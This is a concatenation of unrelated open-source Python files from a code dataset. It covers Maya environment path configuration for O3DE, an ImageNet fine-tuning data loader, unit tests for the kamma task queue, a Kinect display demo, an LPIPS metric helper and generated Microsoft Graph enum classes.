    #MAYA_PLUG_IN_PATH = os.getenv(ENVAR_MAYA_PLUG_IN_PATH, "< NOT SET >")
    #break

DCCSI_MAYA_SHELF_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Prefs', 'Shelves').as_posix()

DCCSI_MAYA_XBMLANGPATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Prefs', 'icons').as_posix()
# is a maya envar
# maya resources, very oddly named
XBMLANGPATH = Path(DCCSI_MAYA_XBMLANGPATH).as_posix()  # extend %XBMLANGPATH%
# to do: remove or extend next PR, technically there can be more then one resource path specified
#while XBMLANGPATH:
    #if ENVAR_XBMLANGPATH in os.environ:
        #maya_xbm_pathlist = os.getenv(ENVAR_XBMLANGPATH).split(os.pathsep)
        #maya_xbm_new_pathlist = maya_xbm_pathlist.copy()
        #maya_xbm_new_pathlist.insert(0, Path(DCCSI_MAYA_XBMLANGPATH).as_posix())
        #os.environ[ENVAR_XBMLANGPATH] = os.pathsep.join(maya_xbm_new_pathlist)
    #else:
        #os.environ[ENVAR_XBMLANGPATH] = DCCSI_MAYA_XBMLANGPATH
    #XBMLANGPATH = os.getenv(ENVAR_XBMLANGPATH, "< NOT SET >")
    #break

DCCSI_MAYA_SCRIPT_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts').as_posix()
DCCSI_MAYA_SCRIPT_MEL_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts', 'Mel').as_posix()
DCCSI_MAYA_SCRIPT_PY_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts', 'Python').as_posix()
MAYA_SCRIPT_PATH = Path(DCCSI_MAYA_SCRIPT_PATH).as_posix()  # extend %MAYA_SCRIPT_PATH%
# to do: remove or extend next PR, technically there can be more then one script path specified
#while MAYA_SCRIPT_PATH:
    #if ENVAR_MAYA_SCRIPT_PATH in os.environ:
        #maya_script_pathlist = os.getenv(ENVAR_MAYA_SCRIPT_PATH).split(os.pathsep)
        #maya_script_new_pathlist = maya_script_pathlist.copy()
        #maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_MEL_PATH)
        #maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_PY_PATH)
        #maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_PATH)
        #os.environ[ENVAR_MAYA_SCRIPT_PATH] = os.pathsep.join(maya_script_new_pathlist)
    #else:
        #os.environ[ENVAR_MAYA_SCRIPT_PATH] = os.pathsep.join( (DCCSI_MAYA_SCRIPT_PATH,
                                                               #DCCSI_MAYA_SCRIPT_PY_PATH,
                                                               #DCCSI_MAYA_SCRIPT_MEL_PATH) )
    #MAYA_SCRIPT_PATH = os.getenv(ENVAR_MAYA_SCRIPT_PATH, "< NOT SET >")
    #break

# is a maya envar
MAYA_VP2_DEVICE_OVERRIDE = "VirtualDeviceDx11"
MAYA_OGS_DEVICE_OVERRIDE = "VirtualDeviceDx11"

DCCSI_MAYA_WIKI_URL = 'https://github.com/o3de/o3de/wiki/O3DE-DCCsi-Tools-DCC-Maya'

# reference, here is a list of Maya envars
# https://github.com/mottosso/Maya-Environment-Variables/blob/master/README.md
# -------------------------------------------------------------------------
###########################################################################
# Main Code Block, runs this script as main (testing)
# -------------------------------------------------------------------------
if __name__ == '__main__':
    """Run this file as a standalone script"""

    # happy print
    _LOGGER.info(STR_CROSSBAR)
    _LOGGER.info('~ {}.py ... Running script as __main__'.format(_MODULENAME))
    _LOGGER.info(STR_CROSSBAR)

    # global debug stuff
    _DCCSI_GDEBUG = env_bool(ENVAR_DCCSI_GDEBUG, True)
    _DCCSI_DEV_MODE = env_bool(ENVAR_DCCSI_DEV_MODE, True)
    # NOTE(review): env_bool for a numeric log *level* looks odd — presumably
    # it passes non-boolean env values through; verify against azpy.env_bool.
    _DCCSI_LOGLEVEL = int(env_bool(ENVAR_DCCSI_LOGLEVEL, _logging.INFO))
    if _DCCSI_GDEBUG:
        # override loglevel if runnign debug
        _DCCSI_LOGLEVEL = _logging.DEBUG

    # configure basic logger
    # note: not using a common logger to reduce cyclical imports
    _logging.basicConfig(level=_DCCSI_LOGLEVEL,
                         format=FRMT_LOG_LONG,
                         datefmt='%m-%d %H:%M')
    # re-configure basic logger for debug
    _LOGGER = _logging.getLogger(_MODULENAME)

    # this is just a debug developer convenience print (for testing acess)
    import pkgutil
    _LOGGER.info('Current working dir: {0}'.format(os.getcwd()))
    search_path = ['.'] # set to None to see all modules importable from sys.path
    all_modules = [x[1] for x in pkgutil.iter_modules(path=search_path)]
    _LOGGER.info('All Available Modules in working dir: {0}'.format(all_modules))

    # override based on current executable
    PATH_DCCSI_PYTHON_LIB = STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
                                                             sys.version_info.major,
                                                             sys.version_info.minor)
    PATH_DCCSI_PYTHON_LIB = Path(PATH_DCCSI_PYTHON_LIB).as_posix()

    # test anything procedurally generated
    _LOGGER.info('Testing procedural env paths ...')
    from pathlib import Path

    _stash_dict = {}
    _stash_dict['O3DE_DEV'] = Path(PATH_O3DE_DEV)
    _stash_dict['PATH_DCCSIG'] = Path(PATH_DCCSIG)
    # NOTE(review): PATH_DCCSI_AZPY_PATH is not imported explicitly above;
    # presumably it arrives via `from azpy.constants import *` — confirm.
    _stash_dict['DCCSI_AZPY_PATH'] = Path(PATH_DCCSI_AZPY_PATH)
    _stash_dict['PATH_DCCSI_TOOLS'] = Path(PATH_DCCSI_TOOLS)
    _stash_dict['PATH_DCCSI_PYTHON_LIB'] = Path(PATH_DCCSI_PYTHON_LIB)
    _stash_dict['PATH_DCCSI_TOOLS_MAYA'] = Path(PATH_DCCSI_TOOLS_MAYA)
    _stash_dict['MAYA_LOCATION'] = Path(MAYA_LOCATION)
    _stash_dict['DCCSI_MAYA_EXE'] = Path(DCCSI_MAYA_EXE)
    _stash_dict['DCCSI_PY_MAYA'] = Path(DCCSI_PY_MAYA)
    _stash_dict['MAYA_SCRIPT_PATH'] = Path(MAYA_SCRIPT_PATH)

    # ---------------------------------------------------------------------
    # py 2 and 3 compatible iter
    # NOTE(review): dict.items() covers this on py3; kept for py2 compat.
    def get_items(dict_object):
        for key in dict_object:
            yield key, dict_object[key]

    for key, value in get_items(_stash_dict):
        # check if path exists
        # NOTE(review): Path.exists() returns False for missing paths rather
        # than raising, so the except branch likely only fires for OS errors.
        try:
            value.exists()
            _LOGGER.info('{0}: {1}'.format(key, value))
        except Exception as e:
            _LOGGER.warning('FAILED PATH: {}'.format(e))

    # custom prompt
    sys.ps1 = "[{}]>>".format(_MODULENAME)

    _LOGGER.debug('{0} took: {1} sec'.format(_MODULENAME, timeit.default_timer() - _START))
# --- END -----------------------------------------------------------------
| 1.734375 | 2 |
lib/data/finetune_imagenet.py | liqi17thu/Stand-Alone-Self-Attention | 1 | 17645 | <reponame>liqi17thu/Stand-Alone-Self-Attention
import torch
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from lib.data.data_util import ImageNetPolicy, ToBGRTensor
from lib.config import cfg
from lib.data.transformer_v2 import get_transforms
def finetune_imagenet():
    """Build ImageNet train/test DataLoaders for the fine-tuning stage.

    Transforms use the fine-tune input size from ``cfg.dataset``. Under DDP
    (``cfg.ddp.distributed``) each dataset is wrapped in a
    ``DistributedSampler``; otherwise the train loader shuffles normally.

    Returns:
        ([train_loader, test_loader], [train_sampler, test_sampler], 1000)
        where the samplers are None outside distributed mode and 1000 is the
        ImageNet class count.
    """
    transformation = get_transforms(input_size=cfg.dataset.finetune_size,
                                    test_size=cfg.dataset.finetune_size,
                                    kind='full', crop=True,
                                    need=('train', 'val'), backbone=None)
    transform_train = transformation['val_train']
    transform_test = transformation['val_test']

    train_data = datasets.ImageFolder(cfg.dataset.train_dir, transform_train)
    test_data = datasets.ImageFolder(cfg.dataset.test_dir, transform_test)

    if cfg.ddp.distributed:
        train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)
        test_sampler = torch.utils.data.distributed.DistributedSampler(test_data)
    else:
        train_sampler = None
        test_sampler = None

    # A DataLoader must not combine shuffle=True with an explicit sampler,
    # so shuffle only when no sampler is present (non-distributed training).
    # This folds the two near-identical construction branches into one.
    train_loader = torch.utils.data.DataLoader(
        train_data, batch_size=cfg.dataset.batch_size,
        sampler=train_sampler, shuffle=(train_sampler is None),
        pin_memory=True, num_workers=cfg.dataset.workers)
    test_loader = torch.utils.data.DataLoader(
        test_data, batch_size=cfg.dataset.batch_size,
        sampler=test_sampler, shuffle=False,
        pin_memory=True, num_workers=cfg.dataset.workers)

    return [train_loader, test_loader], [train_sampler, test_sampler], 1000
| 2.25 | 2 |
test/acceptance/test_kamma.py | marceljanerfont/kamma | 1 | 17646 | # -*- encoding: utf-8 -*-
try:
import unittest2 as unittest
except ImportError:
import unittest
from multiprocessing import Manager
from random import randint
import logging
import sys
import os
import copy
import shutil
# add kamma path
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')))
import kamma
# Directory used as the on-disk task queue for every test below.
TEST_PATH = "test_queue"

# Shared handler/format for all loggers exercised by these tests.
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)-8s] [%(name)-10s] [%(lineno)-4d] %(message)s'))

# kamma's internal loggers get the handler attached; the DEBUG levels are
# left commented so test output stays quiet by default.
logger_kamma = logging.getLogger('kamma.app')
logger_kamma.handlers = [handler]
# logger_kamma.setLevel(logging.DEBUG)
logger_fqueue = logging.getLogger('kamma.queue')
logger_fqueue.handlers = [handler]
# logger_fqueue.setLevel(logging.DEBUG)
logger_task = logging.getLogger('kamma.task')
logger_task.handlers = [handler]
# logger_task.setLevel(logging.DEBUG)

# Logger used by the tests themselves (debug enabled).
logger = logging.getLogger('test')
logger.handlers = [handler]
logger.setLevel(logging.DEBUG)
def _clear_queue():
    """Delete the on-disk test queue directory, ignoring a missing/locked dir.

    ``ignore_errors=True`` replaces the original blanket try/except-pass:
    removal errors (including the directory not existing yet) are suppressed
    without hiding unrelated exceptions.
    """
    shutil.rmtree(TEST_PATH, ignore_errors=True)
# it should be out of the class scope, otherwise
# python tries to pickle all class and its manager and then
# the serialization will fail
# NOTE(review): the setUp methods below assign `the_manager` as a *local*
# name and never rebind this module-level global (no `global` statement),
# so this stays None -- confirm whether the global is actually needed.
the_manager = None
class KammaTestsCheckOrder(unittest.TestCase):
    """Verifies that tasks pushed to a kamma Worker run in FIFO order."""

    def setUp(self):
        _clear_queue()
        self.callbacks = [self.task0, self.task1, self.task2, self.task3, self.task4, self.task5]
        # Manager is necessary because it is modified from different threads
        # NOTE(review): this binds a local name; the module-level
        # `the_manager` global above is left as None.
        the_manager = Manager()
        self.cb_indexs = the_manager.list()
        # 100 random callback indices -- the expected execution order.
        for i in range(0, 100):
            self.cb_indexs.append(randint(0, 5))

    def tearDown(self):
        _clear_queue()

    def _taskx(self, task_id, data):
        # The head of cb_indexs always names the callback expected to fire
        # next; each invocation checks itself against it, then pops it.
        logger.debug("running '{}', remaining {} tasks".format(task_id, len(self.cb_indexs)))
        self.assertEqual(task_id, data['id'], "{} data: {}, tasks: {}".format(task_id, data, self.cb_indexs))
        self.assertEqual(task_id, self.callbacks[self.cb_indexs[0]].__name__)
        self.cb_indexs.pop(0)

    def task0(self, data):
        self._taskx('task0', data)

    def task1(self, data):
        self._taskx('task1', data)

    def task2(self, data):
        self._taskx('task2', data)

    def task3(self, data):
        self._taskx('task3', data)

    def task4(self, data):
        self._taskx('task4', data)

    def task5(self, data):
        self._taskx('task5', data)

    def test_usual_case(self):
        # Register each callback with zero retry delay and a single attempt,
        # push the pre-recorded random sequence, then wait for the queue to
        # drain and confirm every expected invocation happened.
        worker = kamma.Worker(queue_path=TEST_PATH)
        worker.add_task_callback(callback=self.task0, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
        worker.add_task_callback(callback=self.task1, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
        worker.add_task_callback(callback=self.task2, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
        worker.add_task_callback(callback=self.task3, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
        worker.add_task_callback(callback=self.task4, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
        worker.add_task_callback(callback=self.task5, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
        cloned_cb_indexs = copy.deepcopy(self.cb_indexs)
        worker.run_async()
        for i in cloned_cb_indexs:
            worker.push_task(callback=self.callbacks[i], data={'id': self.callbacks[i].__name__})
        worker.wait_empty_event()
        self.assertEqual(0, worker.pending())
        worker.stop()
        # All indices consumed -> tasks ran exactly in push order.
        self.assertEqual(0, len(self.cb_indexs))
class KammaTestsExceptionsInKamma(unittest.TestCase):
    """Verifies kamma's error reporting for API misuse."""

    def setUp(self):
        _clear_queue()

    def tearDown(self):
        _clear_queue()

    def task(self):
        pass

    def test_exception_pushtask_TaskNotRegistered(self):
        # Pushing a callback that was never registered must raise
        # kamma.TaskNotRegistered.
        worker = kamma.Worker(queue_path=TEST_PATH)
        self.assertRaises(kamma.TaskNotRegistered, lambda: worker.push_task(callback=self.task))
        # worker.wait()
        worker.stop()
class KammaTestsExceptionsInTask(unittest.TestCase):
    """Verifies that a failing task is retried until it succeeds."""

    def setUp(self):
        _clear_queue()
        # NOTE(review): local assignment; the module-level `the_manager`
        # global is not rebound here.
        the_manager = Manager()
        self.count = the_manager.list()
        self.count.append(0)
        self.num_failures = 3

    def tearDown(self):
        _clear_queue()

    def task0(self):
        # Fail the first (num_failures - 1) attempts, succeed afterwards.
        self.count[0] = self.count[0] + 1
        if self.count[0] < self.num_failures:
            raise Exception('I don\'t want to work, try {}'.format(self.count[0]))

    def test_exception_in_task(self):
        worker = kamma.Worker(queue_path=TEST_PATH)
        # Allow one more attempt than the number of induced failures.
        worker.add_task_callback(callback=self.task0, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(self.num_failures+1))
        worker.push_task(callback=self.task0)
        worker.run_async()
        worker.wait_empty_event()
        worker.stop()
        # The callback ran exactly num_failures times (final attempt passed).
        self.assertEqual(self.num_failures, self.count[0])
class KammaTestsOnAbortion(unittest.TestCase):
    """Verifies the Worker's on_abortion and on_failure hooks fire."""

    def setUp(self):
        _clear_queue()
        self.abortion_called = False
        self.failure_called = False

    def tearDown(self):
        _clear_queue()

    def task_abort(self):
        # kamma.AbortTask signals the worker to drop the task deliberately.
        raise kamma.AbortTask("I'm indisposed")

    def task_failure(self):
        raise Exception("Boom")

    def on_abortion(self, json_task, reason):
        self.abortion_called = True

    def on_failure(self, json_task, retry_stopped):
        self.failure_called = True

    def test_on_abortion(self):
        # An aborting task must trigger the on_abortion hook.
        worker = kamma.Worker(queue_path=TEST_PATH)
        worker.add_on_abortion(self.on_abortion)
        worker.add_task_callback(self.task_abort)
        worker.run_async()
        worker.push_task(self.task_abort)
        worker.wait_empty_event()
        worker.stop()
        self.assertTrue(self.abortion_called)

    def test_on_failure(self):
        # A task that exhausts its retries must trigger the on_failure hook.
        worker = kamma.Worker(queue_path=TEST_PATH)
        worker.add_on_failure(self.on_failure)
        worker.add_task_callback(self.task_failure, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
        worker.run_async()
        worker.push_task(self.task_failure)
        worker.wait_empty_event()
        worker.stop()
        self.assertTrue(self.failure_called)
if __name__ == '__main__':
unittest.main()
| 2.265625 | 2 |
wrappers/python/demo_mp_sync.py | Qworg/libfreenect | 10 | 17647 | <reponame>Qworg/libfreenect<gh_stars>1-10
#!/usr/bin/env python
import freenect
import matplotlib.pyplot as mp
import frame_convert
import signal
keep_running = True
def get_depth():
    """Grab the next Kinect depth frame, converted for display.

    ``freenect.sync_get_depth()`` returns a tuple; index 0 is presumably
    the frame array (timestamp alongside -- confirm against freenect docs).
    """
    return frame_convert.pretty_depth(freenect.sync_get_depth()[0])
def get_video():
    """Grab the next Kinect RGB frame (element 0 of the sync_get_video tuple)."""
    return freenect.sync_get_video()[0]
def handler(signum, frame):
    """Sets up the kill handler, catches SIGINT"""
    # SIGINT handler: flip the module-level flag so the display loop below
    # exits on its next iteration.
    global keep_running
    keep_running = False
# Interactive display loop: figure 1 shows depth, figure 2 shows RGB,
# refreshed until Ctrl-C flips keep_running via the handler defined above.
mp.ion()
mp.gray()
mp.figure(1)
image_depth = mp.imshow(get_depth(), interpolation='nearest', animated=True)
mp.figure(2)
image_rgb = mp.imshow(get_video(), interpolation='nearest', animated=True)
print('Press Ctrl-C in terminal to stop')
signal.signal(signal.SIGINT, handler)
while keep_running:
    mp.figure(1)
    image_depth.set_data(get_depth())
    mp.figure(2)
    image_rgb.set_data(get_video())
    mp.draw()
    # brief pause so the GUI event loop can process redraws
    mp.waitforbuttonpress(0.01)
| 2.265625 | 2 |
codes/models/modules/LPIPS/compute_dists.py | DinJerr/BasicSR | 5 | 17648 | <filename>codes/models/modules/LPIPS/compute_dists.py
#import models
from models.modules.LPIPS import perceptual_loss as models
####################
# metric
####################
model = None
def calculate_lpips(img1_im, img2_im, use_gpu=False, net='squeeze', spatial=False):
    '''Calculate the LPIPS perceptual distance between two images.

    img1_im, img2_im: BGR images with values in [0, 255].
    use_gpu: run the metric network on CUDA.
    net: LPIPS backbone ('squeeze' is the smallest: needs less RAM and is
        cheaper to load/run on CPU during training).
    spatial: if True the model produces a per-pixel distance map, which is
        reduced with .mean() so the return value is always a scalar tensor.

    NOTE: the model is cached in the module-level `model` global on first
    call; `net`, `use_gpu` and `spatial` passed on later calls are ignored.
    '''
    global model
    # Lazily build the model once and reuse it across calls.
    if model is None:
        model = models.PerceptualLoss(model='net-lin', net=net, use_gpu=use_gpu, spatial=spatial)
    # BGR -> RGB, rescale to [-1, 1] tensors as LPIPS expects.
    img1 = models.im2tensor(img1_im[:, :, ::-1])
    img2 = models.im2tensor(img2_im[:, :, ::-1])
    if use_gpu:
        img1 = img1.cuda()
        img2 = img2.cuda()
    # Compute distance; collapse spatial maps to a scalar so both modes
    # return the same shape (replaces the `if spatial==False` anti-idiom
    # with two near-identical branches).
    dist01 = model.forward(img2, img1)
    if spatial:
        dist01 = dist01.mean()
    return dist01
def cleanup():
    """Drop the cached LPIPS model so it can be garbage collected."""
    global model
    model = None
| 2.171875 | 2 |
msgraph-cli-extensions/v1_0/sites_v1_0/azext_sites_v1_0/vendored_sdks/sites/models/_sites_enums.py | thewahome/msgraph-cli | 0 | 17649 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class Enum100(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Auto-generated property-name vocabulary for an OData query option.

    Values are the raw strings sent on the wire; lookup is case-insensitive
    via _CaseInsensitiveEnumMeta. Do not edit by hand -- regenerated by
    AutoRest (see the file header).
    """

    ID = "id"
    DESCRIPTION = "description"
    GROUP = "group"
    HIDDEN = "hidden"
    INHERITED_FROM = "inheritedFrom"
    NAME = "name"
    ORDER = "order"
    PARENT_ID = "parentId"
    READ_ONLY = "readOnly"
    SEALED = "sealed"
    COLUMN_LINKS = "columnLinks"
class Enum101(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
COLUMN_LINKS = "columnLinks"
class Enum102(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
NAME = "name"
NAME_DESC = "name desc"
class Enum103(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
NAME = "name"
class Enum104(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
NAME = "name"
class Enum105(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DRIVE_TYPE = "driveType"
OWNER = "owner"
QUOTA = "quota"
SHARE_POINT_IDS = "sharePointIds"
SYSTEM = "system"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
FOLLOWING = "following"
ITEMS = "items"
LIST = "list"
ROOT = "root"
SPECIAL = "special"
class Enum106(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
FOLLOWING = "following"
ITEMS = "items"
LIST = "list"
ROOT = "root"
SPECIAL = "special"
class Enum107(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
CONTENT_TYPE = "contentType"
CONTENT_TYPE_DESC = "contentType desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
class Enum108(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
CONTENT_TYPE = "contentType"
SHAREPOINT_IDS = "sharepointIds"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
DRIVE_ITEM = "driveItem"
FIELDS = "fields"
VERSIONS = "versions"
class Enum109(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
DRIVE_ITEM = "driveItem"
FIELDS = "fields"
VERSIONS = "versions"
class Enum110(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
CONTENT_TYPE = "contentType"
SHAREPOINT_IDS = "sharepointIds"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
DRIVE_ITEM = "driveItem"
FIELDS = "fields"
VERSIONS = "versions"
class Enum111(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
DRIVE_ITEM = "driveItem"
FIELDS = "fields"
VERSIONS = "versions"
class Enum112(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ALL_TIME = "allTime"
ITEM_ACTIVITY_STATS = "itemActivityStats"
LAST_SEVEN_DAYS = "lastSevenDays"
class Enum113(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
ALL_TIME = "allTime"
ITEM_ACTIVITY_STATS = "itemActivityStats"
LAST_SEVEN_DAYS = "lastSevenDays"
class Enum114(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
AUDIO = "audio"
CONTENT = "content"
C_TAG = "cTag"
DELETED = "deleted"
FILE = "file"
FILE_SYSTEM_INFO = "fileSystemInfo"
FOLDER = "folder"
IMAGE = "image"
LOCATION = "location"
PACKAGE = "package"
PENDING_OPERATIONS = "pendingOperations"
PHOTO = "photo"
PUBLICATION = "publication"
REMOTE_ITEM = "remoteItem"
ROOT = "root"
SEARCH_RESULT = "searchResult"
SHARED = "shared"
SHAREPOINT_IDS = "sharepointIds"
SIZE = "size"
SPECIAL_FOLDER = "specialFolder"
VIDEO = "video"
WEB_DAV_URL = "webDavUrl"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
WORKBOOK = "workbook"
ANALYTICS = "analytics"
CHILDREN = "children"
LIST_ITEM = "listItem"
PERMISSIONS = "permissions"
SUBSCRIPTIONS = "subscriptions"
THUMBNAILS = "thumbnails"
VERSIONS = "versions"
class Enum115(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
WORKBOOK = "workbook"
ANALYTICS = "analytics"
CHILDREN = "children"
LIST_ITEM = "listItem"
PERMISSIONS = "permissions"
SUBSCRIPTIONS = "subscriptions"
THUMBNAILS = "thumbnails"
VERSIONS = "versions"
class Enum116(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
PUBLICATION = "publication"
PUBLICATION_DESC = "publication desc"
class Enum117(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
PUBLICATION = "publication"
FIELDS = "fields"
class Enum118(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
FIELDS = "fields"
class Enum119(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
PUBLICATION = "publication"
FIELDS = "fields"
class Enum120(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
FIELDS = "fields"
class Enum121(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
APPLICATION_ID = "applicationId"
APPLICATION_ID_DESC = "applicationId desc"
CHANGE_TYPE = "changeType"
CHANGE_TYPE_DESC = "changeType desc"
CLIENT_STATE = "clientState"
CLIENT_STATE_DESC = "clientState desc"
CREATOR_ID = "creatorId"
CREATOR_ID_DESC = "creatorId desc"
ENCRYPTION_CERTIFICATE = "encryptionCertificate"
ENCRYPTION_CERTIFICATE_DESC = "encryptionCertificate desc"
ENCRYPTION_CERTIFICATE_ID = "encryptionCertificateId"
ENCRYPTION_CERTIFICATE_ID_DESC = "encryptionCertificateId desc"
EXPIRATION_DATE_TIME = "expirationDateTime"
EXPIRATION_DATE_TIME_DESC = "expirationDateTime desc"
INCLUDE_RESOURCE_DATA = "includeResourceData"
INCLUDE_RESOURCE_DATA_DESC = "includeResourceData desc"
LATEST_SUPPORTED_TLS_VERSION = "latestSupportedTlsVersion"
LATEST_SUPPORTED_TLS_VERSION_DESC = "latestSupportedTlsVersion desc"
LIFECYCLE_NOTIFICATION_URL = "lifecycleNotificationUrl"
LIFECYCLE_NOTIFICATION_URL_DESC = "lifecycleNotificationUrl desc"
NOTIFICATION_URL = "notificationUrl"
NOTIFICATION_URL_DESC = "notificationUrl desc"
RESOURCE = "resource"
RESOURCE_DESC = "resource desc"
class Enum122(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
APPLICATION_ID = "applicationId"
CHANGE_TYPE = "changeType"
CLIENT_STATE = "clientState"
CREATOR_ID = "creatorId"
ENCRYPTION_CERTIFICATE = "encryptionCertificate"
ENCRYPTION_CERTIFICATE_ID = "encryptionCertificateId"
EXPIRATION_DATE_TIME = "expirationDateTime"
INCLUDE_RESOURCE_DATA = "includeResourceData"
LATEST_SUPPORTED_TLS_VERSION = "latestSupportedTlsVersion"
